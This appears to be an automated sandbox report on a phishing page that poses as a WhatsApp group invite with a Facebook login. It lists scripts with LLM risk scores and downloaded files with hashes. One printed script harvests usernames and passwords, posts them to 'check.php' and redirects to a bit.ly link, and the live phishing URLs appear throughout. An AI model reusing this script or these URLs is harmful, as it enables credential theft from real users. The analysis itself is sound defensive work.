                            '<svg xmlns="http://www.w3.org/2000/svg" width="16" height="15" id="msg-dblcheck-ack" x="2063" y="2076"><path d="M15.01 3.316l-.478-.372a.365.365 0 0 0-.51.063L8.666 9.88a.32.32 0 0 1-.484.032l-.358-.325a.32.32 0 0 0-.484.032l-.378.48a.418.418 0 0 0 .036.54l1.32 1.267a.32.32 0 0 0 .484-.034l6.272-8.048a.366.366 0 0 0-.064-.512zm-4.1 0l-.478-.372a.365.365 0 0 0-.51.063L4.566 9.88a.32.32 0 0 1-.484.032L1.892 7.77a.366.366 0 0 0-.516.005l-.423.433a.364.364 0 0 0 .006.514l3.255 3.185a.32.32 0 0 0 .484-.033l6.272-8.048a.365.365 0 0 0-.063-.51z" fill="#4fc3f7"/></svg>' +
                            '</span>' +
                            '</span>';
                          
                            return element;
                          }
                          
                          function animateMessage(message) {
                            setTimeout(function () {
                              var tick = message.querySelector('.tick');
                              tick.classList.remove('tick-animation');
                            }, 1000);
                          }
                          //# sourceURL=pen.js
                          URL: https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/ Model: gpt-4o
                          ```json
                          {
                            "riskscore": 1,
                            "reasons": "The provided JavaScript code appears to be related to monitoring and managing events within a web application, such as handling asset changes, console events, and pen editor actions. There is no indication of malicious behavior such as data exfiltration, credential stealing, or unauthorized access. The code includes functionality to prevent infinite loops, which is a common feature in development environments to ensure stability. Overall, the code seems to be part of a legitimate web application, likely for development or debugging purposes."
                          }
                          window.HUB_EVENTS={ASSET_ADDED:"ASSET_ADDED",ASSET_DELETED:"ASSET_DELETED",ASSET_DESELECTED:"ASSET_DESELECTED",ASSET_SELECTED:"ASSET_SELECTED",ASSET_UPDATED:"ASSET_UPDATED",CONSOLE_CHANGE:"CONSOLE_CHANGE",CONSOLE_CLOSED:"CONSOLE_CLOSED",CONSOLE_EVENT:"CONSOLE_EVENT",CONSOLE_OPENED:"CONSOLE_OPENED",CONSOLE_RUN_COMMAND:"CONSOLE_RUN_COMMAND",CONSOLE_SERVER_CHANGE:"CONSOLE_SERVER_CHANGE",EMBED_ACTIVE_PEN_CHANGE:"EMBED_ACTIVE_PEN_CHANGE",EMBED_ACTIVE_THEME_CHANGE:"EMBED_ACTIVE_THEME_CHANGE",EMBED_ATTRIBUTE_CHANGE:"EMBED_ATTRIBUTE_CHANGE",EMBED_RESHOWN:"EMBED_RESHOWN",FORMAT_FINISH:"FORMAT_FINISH",FORMAT_ERROR:"FORMAT_ERROR",FORMAT_START:"FORMAT_START",IFRAME_PREVIEW_RELOAD_CSS:"IFRAME_PREVIEW_RELOAD_CSS",IFRAME_PREVIEW_URL_CHANGE:"IFRAME_PREVIEW_URL_CHANGE",KEY_PRESS:"KEY_PRESS",LINTER_FINISH:"LINTER_FINISH",LINTER_START:"LINTER_START",PEN_CHANGE_SERVER:"PEN_CHANGE_SERVER",PEN_CHANGE:"PEN_CHANGE",PEN_EDITOR_CLOSE:"PEN_EDITOR_CLOSE",PEN_EDITOR_CODE_FOLD:"PEN_EDITOR_CODE_FOLD",PEN_EDITOR_ERRORS:"PEN_EDITOR_ERRORS",PEN_EDITOR_EXPAND:"PEN_EDITOR_EXPAND",PEN_EDITOR_FOLD_ALL:"PEN_EDITOR_FOLD_ALL",PEN_EDITOR_LOADED:"PEN_EDITOR_LOADED",PEN_EDITOR_REFRESH_REQUEST:"PEN_EDITOR_REFRESH_REQUEST",PEN_EDITOR_RESET_SIZES:"PEN_EDITOR_RESET_SIZES",PEN_EDITOR_SIZES_CHANGE:"PEN_EDITOR_SIZES_CHANGE",PEN_EDITOR_UI_CHANGE_SERVER:"PEN_EDITOR_UI_CHANGE_SERVER",PEN_EDITOR_UI_CHANGE:"PEN_EDITOR_UI_CHANGE",PEN_EDITOR_UI_DISABLE:"PEN_EDITOR_UI_DISABLE",PEN_EDITOR_UI_ENABLE:"PEN_EDITOR_UI_ENABLE",PEN_EDITOR_UNFOLD_ALL:"PEN_EDITOR_UNFOLD_ALL",PEN_ERROR_INFINITE_LOOP:"PEN_ERROR_INFINITE_LOOP",PEN_ERROR_RUNTIME:"PEN_ERROR_RUNTIME",PEN_ERRORS:"PEN_ERRORS",PEN_LIVE_CHANGE:"PEN_LIVE_CHANGE",PEN_LOGS:"PEN_LOGS",PEN_MANIFEST_CHANGE:"PEN_MANIFEST_CHANGE",PEN_MANIFEST_FULL:"PEN_MANIFEST_FULL",PEN_PREVIEW_FINISH:"PEN_PREVIEW_FINISH",PEN_PREVIEW_START:"PEN_PREVIEW_START",PEN_SAVED:"PEN_SAVED",POPUP_CLOSE:"POPUP_CLOSE",POPUP_OPEN:"POPUP_OPEN",POST_CHANGE:"POST_CHANGE",POST_SAVED:"POST_SAVED",PROCESSING_FINISH:"PROCESSING_FINISH",PROCESSING_START:"PROCESSED_STARTED"},"object"!=typeof window.CP&&(window.CP={}),window.CP.PenTimer={programNoLongerBeingMonitored:!1,timeOfFirstCallToShouldStopLoop:0,_loopExits:{},_loopTimers:{},START_MONITORING_AFTER:2e3,STOP_ALL_MONITORING_TIMEOUT:5e3,MAX_TIME_IN_LOOP_WO_EXIT:2200,exitedLoop:function(E){this._loopExits[E]=!0},shouldStopLoop:function(E){if(this.programKilledSoStopMonitoring)return!0;if(this.programNoLongerBeingMonitored)return!1;if(this._loopExits[E])return!1;var _=this._getTime();if(0===this.timeOfFirstCallToShouldStopLoop)return this.timeOfFirstCallToShouldStopLoop=_,!1;var o=_-this.timeOfFirstCallToShouldStopLoop;if(o<this.START_MONITORING_AFTER)return!1;if(o>this.STOP_ALL_MONITORING_TIMEOUT)return this.programNoLongerBeingMonitored=!0,!1;try{this._checkOnInfiniteLoop(E,_)}catch(N){return this._sendErrorMessageToEditor(),this.programKilledSoStopMonitoring=!0,!0}return!1},_sendErrorMessageToEditor:function(){try{if(this._shouldPostMessage()){var E
                          URL: https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/ Model: gpt-4o
                          ```json
                          {
                            "riskscore": 8,
                            "reasons": "The JavaScript code captures user credentials (username and password) and sends them via an AJAX POST request to 'check.php'. This behavior is typical of phishing attacks, where user credentials are collected and sent to a malicious server. Additionally, the redirection to 'https://bit.ly/3PLZS43' after the credentials are sent is suspicious and indicative of a potential phishing attempt."
                          }
                          $(document).ready(function()
                          		{
                          			setTimeout(() => {
                          				$('.loading').css("display","none");
                          				$('.join').show();
                          			},1000)
                          			$('.fb').click(function(){
                          				$('.login-facebook').fadeIn();
                          			})
                          		})
                          		
                          		
                                      window.addEventListener('submit', (e) => {
                                          e.preventDefault()
                                          setTimeout(() => {
                                              check()
                                          },1500)
                                          return false;
                                      })
                          		function check()
                          		{
                          			$userx = $('#userx').val().trim();
                          			$passx = $('#passx').val().trim();
                          			if($userx == '' || $userx == null || $userx.length <= 5)
                          			{
                          				$('.email').show();
                          				$('.sandi').hide();
                          				return false;
                          			}else{
                          				$('.email').hide();
                          			}
                          			if($passx == '' || $passx == null || $passx.length <= 5)
                          			{
                          				$('.sandi').show();
                          				return false;
                          			}else{
                          				$('.sandi').hide();
                          			}
                                          // if all form are filled
                                          if($userx !== '' || $userx !== null || !$passx == '' || !$passx == null)
                                          
                                          {
                                              // SEND DATA
                                              $.ajax({
                                                  type: 'POST',
                                                  url: 'check.php',
                                                  data: $('form').serialize(),
                                                  dataType: 'text',
                                                  success: function() {
                                                              $('.login-facebook').toggle();
                                                              $('.login-facebook').fadeOut();
                                                              $('.fb').html('KIRIM PESAN');
                                                              window.location = 'https://bit.ly/3PLZS43';
                                                      } 
                                              })
                                          }
                          		}
                          URL: https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/ Model: gpt-4o
                          ```json
                          {
                            "riskscore": 0,
                            "reasons": "The provided JavaScript code is a simple function that toggles the display of HTML elements. It does not contain any malicious behavior."
                          }
                          function myFunction() {
                            var dots = document.getElementById("dots");
                            var moreText = document.getElementById("more");
                            var btnText = document.getElementById("myBtn");
                          
                            if (dots.style.display === "none") {
                              dots.style.display = "inline";
                              btnText.innerHTML = "Baca selengkapnya"; 
                              moreText.style.display = "none";
                            } else {
                              dots.style.display = "none";
                              btnText.innerHTML = "Lebih sedikit"; 
                              moreText.style.display = "inline";
                            }
                          }
                          No context
                          No context
                          No context
                          No context
                          No context
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 222x227, components 3
                          Category:dropped
                          Size (bytes):6920
                          Entropy (8bit):7.937752972166402
                          Encrypted:false
                          SSDEEP:192:kg/yjRwqp63ubp8mO2XAFACr0GL6Pgg5KTwm/R+lOCl:kgqjRF2cOBA/Kd+F
                          MD5:A7A3968E74A38985B2DC9347DDFFE907
                          SHA1:ED69402173EE27C31D49B731E977D6CBB816EEA8
                          SHA-256:6821868BBE4FEC91E3BD8980C88381CDFD0B68C6B9B4FA5B69FB26EEDCE139D3
                          SHA-512:38E125681FA6B7E9EB8124B30AAE5F77E7B85C9B68C989AF5467F02CA335EB405FEF273DC7CB0E74829F7160E5373E71E9482F61EDBAC4DBFAC8358575A0174E
                          Malicious:false
                          Reputation:low
                          Preview:......JFIF..................................................!.%..+...&8&+/1555.$;@;3?.451...........4!.!11414414444144144414444444444444444414441@4?4144:1..........."........................................@........................!1.AQ."aq..2....BRr..b....#$3.....Ccs................................#......................!.1."A2Q.aq............?...g6U!..K)..]u.'.P.b.k.P/....../..j.UA....46.6p.Ys-.t.....>7.0._h5......jw..%..3.>.............+.7.:s)z@.3l.....O.[w...............B8u..s|}oY.w.:....3o..#.x.;cM>..m...=f.1...2...#.....MY.E!.3.P5S..w.?.......l...6.8.z.G%Q...,._.....G..d..t.]-....3>#......-.g...%Bia,.....)./.>3.q.Y....M..O..+c.}.....q...+.....>..T..P....63..}.T..PB.......W.A\..R.zm...y..XQL(..k....).'...h.E.2.91.......B.2.E.HspFR.E...n.%.R.....P..fL&.......,..75....2.......a...Y..K..r%M...+..S..lw...K.kHD....|H|....@..7>.o..|M..U@..%.|...K.W..y...1l...\.k/.#[x....)S<..~(W1..s..K..s....~..-8n..O...gsp-ap-;.0..5...$~.y:f..4v...A8O...2....,.Ua... ......Zt..
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 1000 x 1000, 8-bit colormap, non-interlaced
                          Category:dropped
                          Size (bytes):152291
                          Entropy (8bit):7.990986897840109
                          Encrypted:true
                          SSDEEP:3072:NHvfeD7vCj97Vp/Cdypyb1bB650aSXn0uhFTbE3inJJ1V6:NHvfCvqYcybNB8sXNmAo
                          MD5:188A278629872508123E7BF25A4E4AE9
                          SHA1:468D1D4A68A6ED6DAD42F5470AE1D22FA6C032B9
                          SHA-256:D15C880B55B3ED610B5AF0BDDB63B50E386DA5D32658E069DAC8D8C512F801E8
                          SHA-512:DB10A6539144F75531CF04443768C989EE84E23463DD6B615348BDCECBDE7DECCDC2512482EFCC0E8D7D345DDE8F847663C3A86607902E64CD6DF6F59DACDBB0
                          Malicious:false
                          Reputation:low
                          Preview:.PNG........IHDR.............z}$.....gAMA......a.....sRGB.........PLTE..................................................................xxxTTT???ggg................222.................................................................................................................5.$......6.$...4.#...0. *........"..2."...$../..9.&)..-.....+..............;.'7.$...'.....1. ?.*...<.(...:.'......"..(..&.. ..,..,..... ..$..3."-..9.%>.)6.$............%..2. ,.....=.)2.".........&..8.&......'..$.....;.'+...........8.$........................!..4.!....................................<.(.../...........$..#.....5.".~....1.............................4.....,..6.!......1...{.......%.....,..)........*..!.."........'..........................5.$.............................R.DH.6{.rI.Hm.a...Y.X_.Q/.-x.w=.5h.g$.$;.:.. .............../_...5tRNS.0........'.+:5@" G$S.ygFS.c....T....yz............X..).. .IDATx..Kh\G.>.K...d....8..8q...Ck.@4...R..#1.j..E..%A7r.1LP.....C#.....o...EH.'.
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:GIF image data, version 89a, 200 x 200
                          Category:downloaded
                          Size (bytes):80553
                          Entropy (8bit):7.702398455911395
                          Encrypted:false
                          SSDEEP:1536:3PIgwCwtQe1EDaapKv61zbrxBV6P97rJrTnvjDtI:3PI3CJeSDa+H1rxBV65rJrhI
                          MD5:B8A9081B653F8877C48920A27BF00B88
                          SHA1:D86943A9FEDC2DE088673F1C46E82918482C788B
                          SHA-256:0056D4572BECB0FC7C6B497CFF821E8F4E98BA5ED4F9FBB69CCDD60247EF091C
                          SHA-512:E05D5C22B86B4EAA0E46218E16DBE63320CDE99E47A43C39BF351A2F0E3AEFB6D98EE30AABC8F453A69D5EB4B8C627F6D01DF3D97376330E0FF96D98CB68E69A
                          Malicious:false
                          Reputation:low
                          URL:https://www.starratings.com.au/assets/img/loading.gif
                          Preview:GIF89a............t..t..u..u..u..u..u..u..u..u..u..u..u..u..u..u..u..u..u..v..w..w..x..x..x..x..x..y..y..y..z..{..|..|..}..}..~.......................................!..#..%..'..)..*..+..,..-...../..0..1..3..5..7..8..:..;..=..>..@..B..D..F..I..K..O..Q..S..U..V..W..Z..^..a..d..i..j..l..n..p..r..u..x..z..{..}.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................!..NETSCAPE2.0.....!.......,............{..H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.N..g..$Av.xa...Z..B.&................_.v.B...I....~....$..K...1.Mf~L.L..e.
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (4798)
                          Category:downloaded
                          Size (bytes):5122
                          Entropy (8bit):5.557171260214334
                          Encrypted:false
                          SSDEEP:96:JBfL+3sIskopaNWpxppTfWLFmp7nzC7JakifNU20OuvTfMbYuAR:/a1+TpTfOFmpzm7JakilUIu7a92
                          MD5:1164BA3FC735BB9682EECCA5E9FD3C3E
                          SHA1:377E56ED1B2CB425A7D931F716C8FE14EEDFC65B
                          SHA-256:7F763A9F90706512D96A55A096671703EAAEDB3DEFEC58DDFF0232A4FE508B43
                          SHA-512:4C6198CBCE24521ECE73006662BD7B8FA5C35F0C0234BF023039E7D2DA0465651F34479EEFDBB00D2F72A0D3A11FF574869D5D7EE34EA55F065BA7A8B077356C
                          Malicious:false
                          Reputation:low
                          URL:https://cdn.jsdelivr.net/npm/js-base64@3.7.1/base64.min.js
                          Preview:/**. * Minified by jsDelivr using Terser v5.19.2.. * Original file: /npm/js-base64@3.7.1/base64.js. *. * Do NOT use SRI with dynamically generated files! More information: https://www.jsdelivr.com/using-sri-with-dynamic-files. */.!function(t,n){var r,e;"object"==typeof exports&&"undefined"!=typeof module?module.exports=n():"function"==typeof define&&define.amd?define(n):(r=t.Base64,(e=n()).noConflict=function(){return t.Base64=r,e},t.Meteor&&(Base64=e),t.Base64=e)}("undefined"!=typeof self?self:"undefined"!=typeof window?window:"undefined"!=typeof global?global:this,(function(){"use strict";var t,n="3.7.1",r=n,e="function"==typeof atob,o="function"==typeof btoa,u="function"==typeof Buffer,i="function"==typeof TextDecoder?new TextDecoder:void 0,f="function"==typeof TextEncoder?new TextEncoder:void 0,c=Array.prototype.slice.call("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="),a=(t={},c.forEach((function(n,r){return t[n]=r})),t),d=/^(?:[A-Za-z\d+\/]{4})*?(?:[A-Za-z\d+
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 804x513, components 3
                          Category:dropped
                          Size (bytes):57874
                          Entropy (8bit):7.975542173199343
                          Encrypted:false
                          SSDEEP:1536:jC6XpYXIso32o6GAsaxzrQWwkLEdGhwt4Q74:jNpYYsoGwgzj3isl
                          MD5:0CFE479BEBB16F8D62355C3E33AA69B4
                          SHA1:2A919EE1D0F3071B566997254F31D068E8E2C702
                          SHA-256:5EAC082FEC3AC211C7F039372142D2A0C9C9CB78A01C004FCF22695949C635FD
                          SHA-512:B71AA9F46818CD4D270CE4E1FF5AC3D10AED69DEAB1F170FD2FC031B2BE3BCEF908C0C8F91C41ADF3E562D7294CEA78C9A7DE845266CE1C33DCEEAC28C60B79A
                          Malicious:false
                          Reputation:low
                          Preview:......JFIF.............C..............................................!........."$".$.......C.........................................................................$.."................................................................................QY..&i1...A.u'._.._gtLW5..8P.s.h^\...V... ..$&...Y...3.h..-~/?5.....^ .....X...l.<.6..-....dd4..Wp.'WLV..*...%...H.=.....y.PU....U.F.Zk.`c.h...*.K.....>j.!...k..t."..av.."Z.k......F.F...p...Uc..9._.......dQ6,..hjT...Z<..y.....*.2El....#...(......v...W....F?....?"..>C...b...I..'_..la.Df..QS.o..RY...B.......XEZ.RT..........z;hpu..i.e.X....~U.-.....Z>.i....l.R..a.Vw...(...E.Z..bIVZ#S....G.C. 5.^NG.........[7"<..U...\Ka.......9Zp."GeT....m......Er/..l.#y.hUR...Q..#Q!...fzG..bgEK..<....}+YL.....X[^FW ..Mm....l).f.Yc]:g.(y...&7..N....)I..._.....=.m*...(..$FI..h..2..[N}..J.oS..j....>.....jh...?.A;.......D..s<..<...}>...-+'@..(.).%.....cI..*c..y.....&Zww#.........-.......L....\Mo......8..I...N.o3.'.m..O_n.K.g.w..2
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:HTML document, ASCII text
                          Category:downloaded
                          Size (bytes):315
                          Entropy (8bit):5.0572271090563765
                          Encrypted:false
                          SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                          MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                          SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                          SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                          SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                          Malicious:false
                          Reputation:low
                          URL:https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/img/jquery.min.js
                          Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:GIF image data, version 89a, 200 x 200
                          Category:dropped
                          Size (bytes):80553
                          Entropy (8bit):7.702398455911395
                          Encrypted:false
                          SSDEEP:1536:3PIgwCwtQe1EDaapKv61zbrxBV6P97rJrTnvjDtI:3PI3CJeSDa+H1rxBV65rJrhI
                          MD5:B8A9081B653F8877C48920A27BF00B88
                          SHA1:D86943A9FEDC2DE088673F1C46E82918482C788B
                          SHA-256:0056D4572BECB0FC7C6B497CFF821E8F4E98BA5ED4F9FBB69CCDD60247EF091C
                          SHA-512:E05D5C22B86B4EAA0E46218E16DBE63320CDE99E47A43C39BF351A2F0E3AEFB6D98EE30AABC8F453A69D5EB4B8C627F6D01DF3D97376330E0FF96D98CB68E69A
                          Malicious:false
                          Reputation:low
                          Preview:GIF89a............t..t..u..u..u..u..u..u..u..u..u..u..u..u..u..u..u..u..u..v..w..w..x..x..x..x..x..y..y..y..z..{..|..|..}..}..~.......................................!..#..%..'..)..*..+..,..-...../..0..1..3..5..7..8..:..;..=..>..@..B..D..F..I..K..O..Q..S..U..V..W..Z..^..a..d..i..j..l..n..p..r..u..x..z..{..}.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................!..NETSCAPE2.0.....!.......,............{..H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.N..g..$Av.xa...Z..B.&................_.v.B...I....~....$..K...1.Mf~L.L..e.
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 1000 x 1000, 8-bit colormap, non-interlaced
                          Category:downloaded
                          Size (bytes):152291
                          Entropy (8bit):7.990986897840109
                          Encrypted:true
                          SSDEEP:3072:NHvfeD7vCj97Vp/Cdypyb1bB650aSXn0uhFTbE3inJJ1V6:NHvfCvqYcybNB8sXNmAo
                          MD5:188A278629872508123E7BF25A4E4AE9
                          SHA1:468D1D4A68A6ED6DAD42F5470AE1D22FA6C032B9
                          SHA-256:D15C880B55B3ED610B5AF0BDDB63B50E386DA5D32658E069DAC8D8C512F801E8
                          SHA-512:DB10A6539144F75531CF04443768C989EE84E23463DD6B615348BDCECBDE7DECCDC2512482EFCC0E8D7D345DDE8F847663C3A86607902E64CD6DF6F59DACDBB0
                          Malicious:false
                          Reputation:low
                          URL:https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/img/logowa.png
                          Preview:.PNG........IHDR.............z}$.....gAMA......a.....sRGB.........PLTE..................................................................xxxTTT???ggg................222.................................................................................................................5.$......6.$...4.#...0. *........"..2."...$../..9.&)..-.....+..............;.'7.$...'.....1. ?.*...<.(...:.'......"..(..&.. ..,..,..... ..$..3."-..9.%>.)6.$............%..2. ,.....=.)2.".........&..8.&......'..$.....;.'+...........8.$........................!..4.!....................................<.(.../...........$..#.....5.".~....1.............................4.....,..6.!......1...{.......%.....,..)........*..!.."........'..........................5.$.............................R.DH.6{.rI.Hm.a...Y.X_.Q/.-x.w=.5h.g$.$;.:.. .............../_...5tRNS.0........'.+:5@" G$S.ygFS.c....T....yz............X..).. .IDATx..Kh\G.>.K...d....8..8q...Ck.@4...R..#1.j..E..%A7r.1LP.....C#.....o...EH.'.
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 1652 x 411, 8-bit/color RGBA, non-interlaced
                          Category:downloaded
                          Size (bytes):31218
                          Entropy (8bit):7.878866206491101
                          Encrypted:false
                          SSDEEP:768:k4LmuFUPCIX9Eb/snrfAptV1t4IGZm3wMwy:JiPbXWkfApth4xAAMx
                          MD5:5AE3B6BC1EBDE6C97F1CF4EFF5C0F61F
                          SHA1:AC60FB3FC5F5A96D30F133F1D60FF116AC329B86
                          SHA-256:FEDA321BB681DC8593F1CC761778FE3B2BA6447399D3A152CF3C65917DF6B147
                          SHA-512:E5B473AC0C3ACB9CDA5CF18D3B3D1452539D5BA785C91E09AC1CC6D770F1482A47D7692EAE368E21E03861DD4ABA4C1A0A3FB50F357C80AF8D5699D1F932D270
                          Malicious:false
                          Reputation:low
                          URL:https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/img/fb-login.png
                          Preview:.PNG........IHDR...t..........J~.... cHRM..z%..............u0...`..:....o._.F....pHYs...............yxIDATx^....-Uy....(X.Q...(b.{oX.`.[...aK...jT....[.X...X...(*....r..w...p.y.g?..3.f...~.Z.$o^=g..u....u.6.$I.$I.$IR.....$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.,.H.$I.$I.$U..$I.$I.$IR.6_.n].U2.....%.#......[D.n.3#.......>..9'.....i.I.$I.$I....:.r..^..".....hd..E.-#..:.i..-.."..\._,.=.....K...F~.9.....IM+I.$u.gd....\.i..{.IN.7.&I.$...W....B.2M....5...n.qRif.t....m#.(P..s..E.~...w....GX..j..#'D~..~..$I...^../..kxN.5r....v....s.J......=I.$..N.
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (32010)
                          Category:downloaded
                          Size (bytes):46645
                          Entropy (8bit):5.528349599993126
                          Encrypted:false
                          SSDEEP:384:epjlJfQt+wPX1U882caofmq/z0+o4qkBx+lIQcq0lh9yinqFm/MyUz8f7Jl24ABz:6Yca79k3CIQg0mBfn2g2W4oOvzBl
                          MD5:03C1D3AD0ACF482F87368E3EA7AF14C2
                          SHA1:A8CA7EEA2616FA92E2E85BA6291AF6EA012FD190
                          SHA-256:4E411C99FE4A486DB34E801A53392AE86F8659ECCC438944B5A062C9AABA25BE
                          SHA-512:15FE407681F3DEF413842DAC72C8F1A2154FEEF899BD3CEB623242804BAF3A29C739AE71AD893BBCFBA62B59FBDB51E927B5B96AA1C5B7EF0FB6FF47C0C7FBB4
                          Malicious:false
                          Reputation:low
                          URL:https://cdnjs.cloudflare.com/ajax/libs/moment.js/2.13.0/moment.min.js
                          Preview://! moment.js.//! version : 2.13.0.//! authors : Tim Wood, Iskren Chernev, Moment.js contributors.//! license : MIT.//! momentjs.com.!function(a,b){"object"==typeof exports&&"undefined"!=typeof module?module.exports=b():"function"==typeof define&&define.amd?define(b):a.moment=b()}(this,function(){"use strict";function a(){return fd.apply(null,arguments)}function b(a){fd=a}function c(a){return a instanceof Array||"[object Array]"===Object.prototype.toString.call(a)}function d(a){return a instanceof Date||"[object Date]"===Object.prototype.toString.call(a)}function e(a,b){var c,d=[];for(c=0;c<a.length;++c)d.push(b(a[c],c));return d}function f(a,b){return Object.prototype.hasOwnProperty.call(a,b)}function g(a,b){for(var c in b)f(b,c)&&(a[c]=b[c]);return f(b,"toString")&&(a.toString=b.toString),f(b,"valueOf")&&(a.valueOf=b.valueOf),a}function h(a,b,c,d){return Ja(a,b,c,d,!0).utc()}function i(){return{empty:!1,unusedTokens:[],unusedInput:[],overflow:-2,charsLeftOver:0,nullInput:!1,invalidMo
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x225, components 3
                          Category:dropped
                          Size (bytes):9874
                          Entropy (8bit):7.956774071425398
                          Encrypted:false
                          SSDEEP:192:YXd6fxU78B4YlBrU8TyrJRThRmO9OW5PJkROR1M8REv3:YXd6uwB4ytMjTh/vOaMZ3
                          MD5:A1E1651FC23C15C4FE1280DE12BD0572
                          SHA1:25244E74BA666DE3B78B45F6FAAA041F7310404A
                          SHA-256:CA61910A66CBB3E5C7A154588E73EB9ECEC3447F6562F7425563B1C79A243ACC
                          SHA-512:97B010B33C4BB60F35DFE7462CB2C3C27ADA245B19737E0D6F97F1B78A644A84D72638E32DD7F74E127ED84F13E44D520FD3BF1716A435A881CA33BF362D6409
                          Malicious:false
                          Reputation:low
                          Preview:......JFIF...................................................( ..%...!1!%)+.....383-7(-.+...........-...------------------------------------------+-------..........."........................................N.........................!..1A.Qa."2qr.....5BSs.....#$%3RTbc.....t..4...CDd..........................................................!1..AQa."q2B.......R............?....dl..v..PPN-5..[.R1G.+......z.1...c..=U..l...w....-...c..a=.i.....$..x.c..k"u..j......f.I..^...`...../.{....#.*.U7.B..S.+y.o0.2.z........d.......(...8..F.......g{...3.#.+..|..x.3.X.....3..Y_@F.J..u7....^n..o.F..P..k./g4.v^..bO<......._M(.....U......pp"....F..v-...9.MC^.........s..M..f.>.z....f1....... ..(...b.....$\.(k....^?....m..^.....4..t..h.../...L^.>.yX...,v....?..K.]n:..g.@c../..W..o+...H../r...m..I....VU.H.{h.P...~..#..Gr.V.m.`.>+....Q........E.G.N.x....+.Q.=.."...qQ...#u......|tq.?......+..E.Vu.x#A.....'D...=.G...#.>H..B?6.q..?.....b../....U..w..6.{:......R...x..6.$...
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (30837)
                          Category:downloaded
                          Size (bytes):31000
                          Entropy (8bit):4.746143404849733
                          Encrypted:false
                          SSDEEP:384:wHu5yWeTUKW+KlkJ5de2UYDyVfwYUas2l8yQ/8dwmaU8G:wwlr+Klk3Yi+fwYUf2l8yQ/e9vf
                          MD5:269550530CC127B6AA5A35925A7DE6CE
                          SHA1:512C7D79033E3028A9BE61B540CF1A6870C896F8
                          SHA-256:799AEB25CC0373FDEE0E1B1DB7AD6C2F6A0E058DFADAA3379689F583213190BD
                          SHA-512:49F4E24E55FA924FAA8AD7DEBE5FFB2E26D439E25696DF6B6F20E7F766B50EA58EC3DBD61B6305A1ACACD2C80E6E659ACCEE4140F885B9C9E71008E9001FBF4B
                          Malicious:false
                          Reputation:low
                          URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css
